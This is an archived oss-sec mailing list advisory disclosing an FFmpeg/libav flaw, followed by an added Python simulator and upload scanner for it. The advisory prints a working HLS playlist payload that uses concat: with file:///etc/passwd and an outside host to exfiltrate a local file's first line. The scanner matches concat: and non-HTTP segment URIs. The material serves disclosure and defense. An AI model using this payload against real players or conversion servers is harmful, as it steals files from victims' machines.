oss-sec mailing list archives

Fwd: FFmpeg: stealing local files with HLS+concat


From: Vladimir Dubrovin <vlad () securityvulns ru>
Date: Wed, 13 Jan 2016 14:01:55 +0300


---------- Forwarded message ----------
From: Максим Андреев <andreevmaxim () gmail com>
Date: 13 January 2016 at 13:41
Subject: FFmpeg: stealing local files with HLS+concat
To: oss-security () lists openwall com


Hello!
I found some strange behavior in ffmpeg which can lead to stealing local
files during ffmpeg/ffprobe execution; it also applies to libav.

I underestimated the impact of this bug, so it was fully disclosed
in this article (in Russian, but Google Translate works fine with
it) - http://habrahabr.ru/company/mailru/blog/274855


In short:
if a Linux user downloads a specially prepared video file (with any
extension: avi/mov/etc.) which contains an HLS m3u8 playlist with the "concat"
protocol in the URL:
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://dx.su/header.m3u8|file:///etc/passwd
#EXT-X-ENDLIST

header.m3u8:
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://example.org?

If the user launches an ffmpeg-based video player (MPlayer, etc.), the first line
of /etc/passwd will be sent to http://example.org? in an
http://example.org?# $FreeBSD: release/100.0/et..  request.
The same happens when a file manager tries to generate a thumbnail for this
file.

All this also applies to server-run ffmpeg during video conversion.
The FFmpeg/libav security teams have already been notified, but official patches
are not available yet, so you can rebuild ffmpeg with the --disable-network
configure option, which prevents this vulnerability from being exploited.

Moreover, it is always recommended to run ffmpeg in an isolated environment
when processing untrusted files
(googleonlinesecurity.blogspot.ru/2014/01/ffmpeg-and-thousand-fixes.html)

-- 
Maxim Andreev
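The following is an added example, not code from the original post or from the FFmpeg/libav projects. It does two things in plain Python: it reproduces, on constructed sample data, what the HLS parser sees once the concat: protocol has glued the attacker's header.m3u8 (whose last line is an unterminated URL) onto a local file, which is why exactly one line of that file ends up in the outgoing request; and it gives a pre-processing check that a server could run over untrusted uploads before handing them to ffmpeg, flagging embedded playlists whose segment URIs use concat: or a non-HTTP scheme. The parsing rule used (only the line directly following an #EXTINF tag is a segment URI) is the HLS playlist rule, simplified; the header playlist, the sample /etc/passwd lines and the sample upload are all constructed here, and the scanner's choice to look for #EXTM3U anywhere in the file rather than only at offset zero is a conservative design choice of this example.

```python
"""Added example (not from the original post or the FFmpeg project).

1. simulate_concat_leak(): shows what the HLS demuxer sees after
   concat:<header.m3u8>|<local file>, and why only one line leaks.
2. scan_for_hls_concat(): a check for untrusted uploads that flags
   embedded HLS playlists with concat: or non-HTTP segment URIs.

All sample inputs below are constructed for the example.
"""
from typing import List, Optional
from urllib.parse import urlsplit

# Constructed: the attacker's header.m3u8 from the post, deliberately
# written WITHOUT a trailing newline so the next byte source continues
# the URL line.
HEADER_M3U8 = "#EXTM3U\n#EXT-X-MEDIA-SEQUENCE:0\n#EXTINF:,\nhttp://example.org?"

# Constructed stand-in for the victim's /etc/passwd (first two lines).
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
)

# Constructed stand-in for the downloaded "video" file: an HLS playlist
# whose only segment uses the concat: protocol with a file: component.
MALICIOUS_UPLOAD = (
    b"#EXTM3U\n#EXT-X-MEDIA-SEQUENCE:0\n#EXTINF:10.0,\n"
    b"concat:http://dx.su/header.m3u8|file:///etc/passwd\n#EXT-X-ENDLIST\n"
)

SAFE_SCHEMES = {"http", "https"}


def parse_segment_uris(playlist: str) -> List[str]:
    """Return the segment URIs of an HLS media playlist.

    A non-tag line is a segment URI only when it directly follows an
    #EXTINF tag; other non-tag lines are ignored. This is why, after the
    concat trick, just the first line of the appended local file becomes
    part of a fetched URI: later lines have no #EXTINF in front of them.
    """
    uris: List[str] = []
    expect_segment = False
    for raw in playlist.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#EXTINF"):
            expect_segment = True
        elif line.startswith("#"):
            continue  # other tags and comments
        elif expect_segment:
            uris.append(line)
            expect_segment = False
    return uris


def simulate_concat_leak(header: str, local_file: str) -> List[str]:
    """Model concat:<header>|<local_file>: the two byte streams are simply
    joined, then parsed as one playlist. The returned URIs are what an
    ffmpeg-based player would try to fetch over the network."""
    return parse_segment_uris(header + local_file)


def classify_uri(uri: str) -> Optional[str]:
    """Reason a segment URI is suspicious, or None if it looks ordinary.

    Relative segment names (scheme-less, e.g. seg1.ts) are the normal
    case and are left alone; anything that is not plain HTTP(S) is not
    something a playlist from the network should be pointing at.
    """
    if uri.startswith("concat:"):
        # ffmpeg's concat protocol joins the '|'-separated components.
        for part in uri[len("concat:"):].split("|"):
            reason = classify_uri(part)
            if reason:
                return f"concat: component {part!r}: {reason}"
        return "concat: protocol inside an HLS segment URI"
    scheme = urlsplit(uri).scheme.lower()
    if scheme and scheme not in SAFE_SCHEMES:
        return f"non-HTTP scheme {scheme!r}"
    return None


def scan_for_hls_concat(data: bytes) -> List[str]:
    """Findings for an untrusted media file (empty list = nothing found).

    The extension is irrelevant to ffmpeg, which picks the demuxer from
    the content, so the scanner ignores it too and searches for the
    #EXTM3U marker anywhere in the file (conservative; real probing only
    looks at the start)."""
    idx = data.find(b"#EXTM3U")
    if idx < 0:
        return []
    playlist = data[idx:].decode("utf-8", errors="replace")
    findings = []
    for uri in parse_segment_uris(playlist):
        reason = classify_uri(uri)
        if reason:
            findings.append(f"{uri}: {reason}")
    return findings


if __name__ == "__main__":
    print("URIs fetched after concat:", simulate_concat_leak(HEADER_M3U8, SAMPLE_PASSWD))
    print("Upload findings:", scan_for_hls_concat(MALICIOUS_UPLOAD))
```

Running the block prints a single fetched URI, http://example.org? with the first passwd line glued on, and one finding for the upload pointing at the file: component. The scanner is a content filter, not a substitute for the mitigations in the post: a --disable-network build and a sandbox still matter, since a playlist can also be reached through other containers and protocols that a simple marker search will not see.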

